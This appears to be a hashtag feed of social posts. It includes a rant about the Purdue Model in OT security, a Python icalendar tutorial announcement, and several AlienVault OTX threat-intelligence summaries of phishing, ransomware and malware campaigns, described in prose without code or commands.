I just realized that so many people in the company simply don’t understand, or don’t want to understand, the Purdue Model!

The Purdue Model is a functional model. Its origins have nothing to do with cybersecurity. It was adopted for cybersecurity, but not as a “zone” model. Its purpose is to define the functional layers at which different methods and tools are used. You don’t simply use typical IT tools at the lower levels!

The DMZ was added much later, as the model evolved into a cybersecurity model. “Additional segmentation can be performed using the concept of zones and conduits described in ISA 62443.” The layers are not intended to define a zone per se. Anyone who does not divide the layers into discrete security zones based on an analysis should not even attempt to work in this (OT) area!

Furthermore, individuals have the flexibility to design their own separation, segmentation, and zone configuration within each architecture, taking into account specific functional and application-related requirements. This approach enables the creation of a robust defense in depth, with the Purdue model serving as a guide while allowing for customization as needed, without rigid requirements.

I will not show these guys how the ISA62443 and the Purde model match. Because I expect that experts can do it and those who can't do it have to learn.

#OTSecurity #Cybersecurity #ICS #Purdue

Threat Spotlight: ShinyHunters Fast-Tracks SaaS Access with Subdomain Impersonation

The threat group ShinyHunters has adopted a new tactic of subdomain impersonation for initial access, moving away from newly registered lookalike domains. They are utilizing mobile-first lures and outsourcing spam services to scale their operations. The group is likely reusing previously stolen CRM and ERP data to drive social engineering attacks. Their approach involves phone-guided adversary-in-the-middle phishing to capture credentials and authenticated sessions. ShinyHunters is also scaling vishing operations through paid contractors and specialized harassment services. This evolution in tactics allows for rapid identity-to-SaaS compromise without deploying malware, making traditional domain-based monitoring less effective.

Pulse ID: 69bc06c6867cdad6f8a94d99
Pulse Link: https://otx.alienvault.com/pulse/69bc06c6867cdad6f8a94d99
Pulse Author: AlienVault
Created: 2026-03-19 14:23:02

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AdversaryInTheMiddle #CyberSecurity #ICS #InfoSec #Malware #OTX #OpenThreatExchange #Phishing #RAT #SocialEngineering #Spam #bot #AlienVault

When tax season becomes cyberattack season: Phishing and malware campaigns using tax-related lures

During tax season, threat actors exploit the urgency of time-sensitive tax-related emails to trick targets into opening malicious attachments, scanning QR codes, or following link chains. Recent campaigns identified by Microsoft Threat Intelligence use lures around W-2 forms, tax forms, and impersonation of government tax agencies and financial institutions. These campaigns aim to harvest credentials or deliver malware, often using phishing-as-a-service platforms for convincing credential theft and MFA bypass. Notable tactics include using legitimate remote monitoring tools, targeting specific industries and roles like accountants, and employing sophisticated social engineering techniques. The campaigns leverage various file formats, legitimate infrastructure, and multiple user interactions to complicate detection.

Pulse ID: 69bc161bd79aba8d7aaa1eed
Pulse Link: https://otx.alienvault.com/pulse/69bc161bd79aba8d7aaa1eed
Pulse Author: AlienVault
Created: 2026-03-19 15:28:27

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberAttack #CyberSecurity #Email #Government #ICS #InfoSec #MFA #Malware #Microsoft #OTX #OpenThreatExchange #Phishing #RAT #SocialEngineering #bot #AlienVault

An Overview of The Gentlemen's TTPs

This intelligence report provides a comprehensive analysis of The Gentlemen, a ransomware group known for its sophisticated tactics, techniques, and procedures (TTPs). The group exploits vulnerabilities in FortiOS/FortiProxy, maintains a database of compromised devices, and employs advanced defense evasion techniques. Their initial access methods include exploiting public-facing applications and brute-force attacks. The Gentlemen utilize various execution, persistence, and privilege escalation techniques, while also focusing on credential access and lateral movement. The group's impact includes data encryption and inhibiting system recovery. The report highlights the group's ongoing efforts to improve their ransomware capabilities by reverse-engineering other malware samples.

Pulse ID: 69bd045137b178c16714dcf6
Pulse Link: https://otx.alienvault.com/pulse/69bd045137b178c16714dcf6
Pulse Author: AlienVault
Created: 2026-03-20 08:24:49

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #Encryption #ICS #InfoSec #Malware #OTX #OpenThreatExchange #Proxy #RCE #RansomWare #bot #iOS #AlienVault

Thanks to @PeskyPotato, #icalendar now has its first #tutorial!

🎉

Learn about how to create a #calendar #event, invite attendees and save it in an #ics file here:

https://icalendar.readthedocs.io/en/latest/tutorials/create-event-with-attendees.html

#rfc5545 #Python

Inside a network of 20,000+ fake shops

A massive network of over 20,000 fraudulent e-commerce domains has been uncovered, all sharing common infrastructure and design patterns. These fake shops, primarily using the .shop domain, are designed to steal payment details and personal data from unsuspecting consumers. The operation is highly industrialized, with domains resolving to just 36 IP addresses, indicating a franchise-style model where a core team manages servers and templates while individual operators launch storefronts. The shops use familiar e-commerce tactics and psychological pressure to lure victims. To protect yourself, use browser protection tools, scrutinize unfamiliar domains, be wary of deep discounts, and look for independent reviews before making purchases.

Pulse ID: 69bad1ce2e55cd63732636dd
Pulse Link: https://otx.alienvault.com/pulse/69bad1ce2e55cd63732636dd
Pulse Author: AlienVault
Created: 2026-03-18 16:24:46

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #ELF #ICS #InfoSec #OTX #OpenThreatExchange #RAT #RCE #bot #AlienVault

Minecraft: Dark Tale of Scams, Malware & Extortion

The article exposes a sophisticated scam targeting Minecraft players through fake 'grief-free' server communities. The SugarSMP website, promising a safe gaming experience, was found to distribute malware-infected mod packs. The malware, named Spark stealer, steals sensitive data including Discord tokens, browser credentials, and crypto wallet information. The threat actors employ social engineering tactics to maintain their fake community's reputation and remove warnings about their activities. Multiple similar websites were discovered, all hosting various types of malware. The scam's persistence mechanisms and social engineering techniques are detailed, along with remediation steps for affected users.

Pulse ID: 69ba817a667265c550e1ce4a
Pulse Link: https://otx.alienvault.com/pulse/69ba817a667265c550e1ce4a
Pulse Author: AlienVault
Created: 2026-03-18 10:42:02

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #Discord #Extortion #ICS #InfoSec #Malware #Minecraft #OTX #OpenThreatExchange #SMS #SocialEngineering #bot #AlienVault

Analysis of the Spear-Phishing and KakaoTalk-Linked Threat Campaign

The Konni Group conducted a sophisticated multi-stage attack campaign, initiating with a spear-phishing email disguised as a North Korean human rights lecturer appointment. The attack progressed through execution of a malicious LNK file, installation of remote access malware, and long-term persistence for data theft. A key feature was the unauthorized access to victims' KakaoTalk PC applications, used to distribute additional malicious files to selected contacts. The campaign employed multiple RAT families, including EndRAT, RftRAT, and RemcosRAT, with a distributed C2 infrastructure across Finland, Japan, and the Netherlands. The threat actor's tactics included trust-based propagation, account session abuse, and modular payload deployment, highlighting the need for advanced behavior-based detection and multi-layered defense strategies.

Pulse ID: 69ba831f2287b29db4e4645e
Pulse Link: https://otx.alienvault.com/pulse/69ba831f2287b29db4e4645e
Pulse Author: AlienVault
Created: 2026-03-18 10:49:03

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DRat #DataTheft #Email #Finland #ICS #InfoSec #Japan #Konni #Korea #LNK #Malware #NorthKorea #OTX #OpenThreatExchange #Phishing #RAT #Remcos #RemcosRAT #Rust #SpearPhishing #TheNetherlands #bot #AlienVault

Contagious Trader campaign - Coordinated weaponisation of cryptocurrency trading bots by suspected DPRK malware operators

The Contagious Trader campaign is a sophisticated malware operation targeting cryptocurrency users, attributed to North Korea with high confidence. It involves malicious cryptocurrency trading bot projects on GitHub that exfiltrate sensitive data and private keys using various techniques, including malicious npm dependencies. The campaign demonstrates overlaps with known North Korean tactics, particularly those of FAMOUS CHOLLIMA, including the use of GitHub, npm, and Vercel infrastructure, Base64-encoded payload URLs, and anonymizing VPNs for npm package publishing. The operation represents a shift in tactics, expanding beyond the previous Contagious Interview campaign to target a broader range of cryptocurrency users.

Pulse ID: 69ba83542e3e56c9806b9659
Pulse Link: https://otx.alienvault.com/pulse/69ba83542e3e56c9806b9659
Pulse Author: AlienVault
Created: 2026-03-18 10:49:56

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DPRK #GitHub #ICS #InfoSec #Korea #Malware #NPM #NorthKorea #OTX #OpenThreatExchange #RAT #RCE #VPN #bot #cryptocurrency #AlienVault